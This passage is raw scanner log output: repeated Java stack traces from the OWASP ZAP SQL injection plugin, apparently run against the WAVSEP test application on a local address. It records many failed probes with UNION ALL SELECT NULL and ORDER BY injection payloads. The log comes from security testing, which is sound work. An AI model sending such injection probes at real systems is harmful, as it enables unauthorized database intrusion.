org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681937 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681938 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681938 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com ORDER BY 6980#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com ORDER BY 6980# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681939 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681940 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681940 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681942 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681942 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681943 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681944 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681944 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681945 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at 